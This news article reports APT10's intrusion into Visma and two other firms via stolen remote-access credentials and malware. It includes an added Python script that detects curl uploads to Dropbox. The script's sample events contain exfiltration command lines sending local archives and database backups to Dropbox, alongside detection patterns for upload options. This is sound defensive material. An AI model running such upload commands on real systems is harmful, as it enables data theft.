Computer plate and flag of China

The Chinese state-sponsored threat actor APT10 used stolen remote access software credentials to infiltrate the network of Norwegian managed services provider Visma last year, likely in an effort to launch secondary attacks against the MSP’s clients.

An investigation into the cyber espionage campaign revealed that APT10, aka Stone Panda, used similar tactics to invade the networks of at least two other companies – an international apparel retailer and a U.S.-based law firm with a specialization in intellectual property law.

Researchers with Recorded Future’s Insikt Group as well as Rapid7 divulged details of the plot today in a jointly authored blog post and analysis report.

The three organizations were attacked separately between November 2017 and September 2018. In all three cases, the malicious actors initially accessed the companies' networks using valid stolen passwords for either Citrix or LogMeIn. They then enumerated what they could reach and elevated their privileges before using DLL sideloading techniques (a common modus operandi of APT10) to deliver malware.

Visma was infected by a newly discovered version of the Trochilus remote access trojan. Normally, the RAT encrypts its command-and-control communications using the RC4 stream cipher, but this latest version uses a combination of XOR, RC4 and Salsa20, the analysis explains. Meanwhile, the other two victimized networks were struck with a newly observed version of the UPPERCUT (ANEL) backdoor malware program. Recorded Future and Rapid7 note that APT10 has a history of using Trochilus and that UPPERCUT has been linked exclusively to the group.

The hackers also used Mimikatz to conduct credential theft and exfiltrated key data from their victims via a Dropbox account, using the cURL for Windows command-line tool.
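The exfiltration step described above (the cURL for Windows tool pushing data to a Dropbox account) is one that a defender can hunt for in endpoint process-creation telemetry. The following is an added detection example, not code from the Recorded Future/Rapid7 report or from any of the organizations named: it scans constructed Sysmon-style process events (the field names `host`, `image`, `cmdline` and `parent` are an assumption) and flags only the combination of a curl binary, a Dropbox domain, and a command-line option that sends local content upward, so ordinary curl downloads from the same service are not reported.

```python
import re
import shlex
from typing import Dict, List

# Domains of the cloud-storage service named in the report; extend for your environment.
CLOUD_STORAGE_DOMAINS = ("dropbox.com", "dropboxapi.com")

# curl options that send local content to the server (uploads), as opposed to downloads.
# Compared case-sensitively: curl's "-T" (upload) and "-t" (telnet option) are different.
UPLOAD_FLAGS = {"-T", "--upload-file", "--data-binary", "-d", "--data", "-F", "--form"}
# Methods that indicate a write rather than a fetch when given via -X/--request.
WRITE_METHODS = {"post", "put"}

URL_HOST_RE = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)

# Constructed sample process-creation events (Sysmon-like fields), not real Visma telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "ws-01", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "parent": "services.exe"},
    {"host": "ws-02", "image": r"C:\Users\Public\curl.exe",
     "cmdline": r"curl.exe -T C:\Users\Public\archive.7z https://content.dropboxapi.com/2/files/upload",
     "parent": "cmd.exe"},
    {"host": "ws-03", "image": r"C:\Tools\curl.exe",
     "cmdline": "curl.exe -s https://example.com/update.txt -o update.txt", "parent": "powershell.exe"},
    {"host": "ws-04", "image": r"C:\Program Files\curl\curl.exe",
     "cmdline": r'"C:\Program Files\curl\curl.exe" -X POST --data-binary "@C:\temp\db.bak" https://content.dropboxapi.com/2/files/upload',
     "parent": "cmd.exe"},
    {"host": "ws-05", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -o notes.txt https://www.dropbox.com/s/abc123/notes.txt", "parent": "explorer.exe"},
    {"host": "ws-06", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Invoke-WebRequest https://www.dropbox.com/s/abc123/notes.txt",
     "parent": "explorer.exe"},
]


def _tokens(cmdline: str) -> List[str]:
    """Split a Windows command line into tokens, keeping backslashes and quotes intact."""
    try:
        return shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quotes: fall back to whitespace splitting
        return cmdline.split()


def is_curl(image: str) -> bool:
    """True when the executing image is a curl binary, wherever it lives on disk."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name in ("curl.exe", "curl")


def upload_indicators(cmdline: str) -> List[str]:
    """Return the reasons a curl command line looks like an upload rather than a download."""
    toks = [t.strip('"') for t in _tokens(cmdline)]
    reasons: List[str] = []
    for i, tok in enumerate(toks):
        if tok in UPLOAD_FLAGS:
            reasons.append(f"upload option {tok}")
        elif tok in ("-X", "--request") and i + 1 < len(toks) and toks[i + 1].lower() in WRITE_METHODS:
            reasons.append(f"method {toks[i + 1].upper()}")
    return reasons


def cloud_hosts(cmdline: str) -> List[str]:
    """Extract URL hosts from the command line that belong to a watched cloud-storage domain."""
    hosts: List[str] = []
    for m in URL_HOST_RE.finditer(cmdline):
        host = m.group(1).lower().split(":")[0]  # drop an explicit port, if any
        if any(host == d or host.endswith("." + d) for d in CLOUD_STORAGE_DOMAINS):
            hosts.append(host)
    return hosts


def find_curl_cloud_uploads(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Flag events where curl sends local data to a watched cloud-storage domain."""
    hits: List[Dict[str, object]] = []
    for ev in events:
        if not is_curl(ev["image"]):
            continue
        hosts = cloud_hosts(ev["cmdline"])
        reasons = upload_indicators(ev["cmdline"])
        if hosts and reasons:  # both conditions required: destination AND upload semantics
            hits.append({"host": ev["host"], "dest": hosts[0], "parent": ev["parent"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_curl_cloud_uploads(SAMPLE_EVENTS):
        print(f"{hit['host']}: curl upload to {hit['dest']} (parent {hit['parent']}): {', '.join(hit['reasons'])}")
```

Requiring both a watched destination and an upload option keeps the rule from firing on routine downloads from the same service (ws-05 above), while catching the two uploads regardless of where the curl binary was placed. A production version would take the domain list from policy rather than a constant and would correlate hits with the preceding credential-access activity the report describes.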

Run by China’s Ministry of State Security intelligence agency, APT10 is well known for attacking MSPs and their clients, particularly in a campaign launched in early 2017 called Operation Cloud Hopper.

“Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds, if not thousands, of corporations around the world,” the blog post states. “We assess that APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks, and not of stealing Visma intellectual property.”

Just last December, the U.S. Department of Justice charged alleged MSS-sponsored hackers Zhu Hua and Zhang Shilong for multiple computer intrusions resulting in intellectual property theft.

“We believe APT10 is the most significant Chinese state-sponsored cyber threat to global corporations known to date,” the blog post declares.